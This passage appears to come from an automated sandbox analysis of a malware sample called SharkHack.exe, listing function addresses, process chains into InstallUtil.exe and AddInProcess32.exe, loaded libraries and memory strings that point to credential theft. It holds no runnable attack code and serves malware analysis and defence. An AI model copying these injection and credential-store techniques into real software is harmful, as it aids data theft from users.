                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043C1B010_2_0043C1B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043F1B010_2_0043F1B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00427A5A10_2_00427A5A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041D26010_2_0041D260
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00423A6010_2_00423A60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042C26C10_2_0042C26C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042CA3510_2_0042CA35
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042CAF110_2_0042CAF1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043F2F610_2_0043F2F6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040428010_2_00404280
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042C28210_2_0042C282
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043EA8010_2_0043EA80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042634010_2_00426340
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042CB4C10_2_0042CB4C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042636010_2_00426360
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041936210_2_00419362
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041AB0010_2_0041AB00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043730010_2_00437300
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00427B0810_2_00427B08
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00432B1010_2_00432B10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043F33010_2_0043F330
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004073C010_2_004073C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00404BC010_2_00404BC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043F3C010_2_0043F3C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041C3CC10_2_0041C3CC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004393D010_2_004393D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00423BE010_2_00423BE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040EB8010_2_0040EB80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043FB8010_2_0043FB80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042238D10_2_0042238D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043F45010_2_0043F450
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00439C7010_2_00439C70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042847D10_2_0042847D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043BCE010_2_0043BCE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004384F010_2_004384F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00421C8010_2_00421C80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0044048010_2_00440480
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041DC9010_2_0041DC90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004274A510_2_004274A5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00427CB010_2_00427CB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043655410_2_00436554
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00432D7010_2_00432D70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040ED7510_2_0040ED75
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043150E10_2_0043150E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043C51010_2_0043C510
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041D53010_2_0041D530
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00414DC010_2_00414DC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00437DE010_2_00437DE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004065F010_2_004065F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00418DF110_2_00418DF1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042FDF910_2_0042FDF9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040AD9010_2_0040AD90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004095A010_2_004095A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00436DB210_2_00436DB2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041FE7C10_2_0041FE7C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043FE2010_2_0043FE20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00402ED010_2_00402ED0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040C6F010_2_0040C6F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040D6F810_2_0040D6F8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042BE8A10_2_0042BE8A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041DE9010_2_0041DE90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041874010_2_00418740
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00428F6C10_2_00428F6C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041477710_2_00414777
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004237D010_2_004237D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00417FE110_2_00417FE1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041EFE010_2_0041EFE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00416F8D10_2_00416F8D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042F7BC10_2_0042F7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00407EE0 appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00414110 appears 82 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6744 -s 984
Source: SharkHack.exe, 00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SharkHack.exe
Source: SharkHack.exe, 00000000.00000002.2889837559.0000000008980000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRP8SH.dll6 vs SharkHack.exe
Source: SharkHack.exe, 00000000.00000002.2881426397.0000000005E70000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMofInagitap.dll8 vs SharkHack.exe
Source: SharkHack.exe, 00000000.00000002.2860912420.0000000003D2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SharkHack.exe
Source: SharkHack.exe, 00000000.00000002.2850825306.0000000001C3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SharkHack.exe
Source: SharkHack.exe, 00000000.00000002.2875564569.0000000004999000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SharkHack.exe
Source: SharkHack.exe, 00000000.00000002.2860912420.0000000003991000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SharkHack.exe
Source: SharkHack.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SharkHack.exe, nf7qV5XWlBC.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, TRYKkNvh8fRn9U4uBi5.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, TRYKkNvh8fRn9U4uBi5.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, TRYKkNvh8fRn9U4uBi5.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, TRYKkNvh8fRn9U4uBi5.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TRYKkNvh8fRn9U4uBi5.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TRYKkNvh8fRn9U4uBi5.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TRYKkNvh8fRn9U4uBi5.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TRYKkNvh8fRn9U4uBi5.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SharkHack.exe.5e70000.3.raw.unpack, Class12_Startup.cs | Task registration methods: 'CreateCanceledTask'
Source: 7.2.InstallUtil.exe.44e31f0.0.raw.unpack, Class12_Startup.cs | Task registration methods: 'CreateCanceledTask'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@12/5@1/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 10_2_00438860 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString
Source: C:\Users\user\Desktop\SharkHack.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SharkHack.exe.log
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6744
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\0b50c193-2eca-4372-8db9-e5951a8f23e1
Source: SharkHack.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SharkHack.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SharkHack.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: AddInProcess32.exe, 0000000A.00000002.2928100351.0000000003928000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknown | Process created: C:\Users\user\Desktop\SharkHack.exe "C:\Users\user\Desktop\SharkHack.exe"
Source: C:\Users\user\Desktop\SharkHack.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\SharkHack.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\SharkHack.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\SharkHack.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6744 -s 984
Source: C:\Users\user\Desktop\SharkHack.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\SharkHack.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\SharkHack.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\SharkHack.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\SharkHack.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SharkHack.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: SharkHack.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SharkHack.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: SharkHack.exe | Static file information: File size 7181824 > 1048576
Source: SharkHack.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x6b3800
Source: SharkHack.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.ni.pdbRSDS | source: WER11DB.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\InstallUtil.pdbK | source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbi | source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: ((.pdb | source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb | source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS | source: WER11DB.tmp.dmp.13.dr
Source: Binary string: InstallUtil.pdb | source: InstallUtil.exe, 00000009.00000002.2929951548.0000000003409000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbl | source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb | source: WER11DB.tmp.dmp.13.dr
Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdbX | source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: til.pdb | source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdb | source: WER11DB.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb1F | source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb | source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbp | source: WER11DB.tmp.dmp.13.dr
Source: Binary string: mscorlib.pdb | source: WER11DB.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb V | source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.pdbH source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb`[p source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000009.00000002.2929951548.0000000003409000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Core.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: InstallUtil.pdb\rvr <{ source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: InstallUtil.pdbYYc source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
